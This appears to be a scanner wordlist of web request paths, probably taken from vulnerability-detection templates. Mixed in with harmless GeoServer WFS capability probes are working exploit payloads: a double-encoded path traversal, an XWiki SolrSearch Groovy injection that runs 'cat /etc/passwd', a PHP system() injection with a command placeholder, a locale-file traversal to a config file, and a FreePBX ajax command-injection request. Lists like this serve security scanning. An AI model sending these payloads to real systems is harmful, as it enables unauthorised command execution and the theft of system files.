/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css
/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20
{{endpoints}}
/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
/{{path}}
/pbxcore/api/files/uploadFile
/admin-cabinet/§extracted_path§?{{wait_for(5)}}
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/posts?authorMatch={
/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x
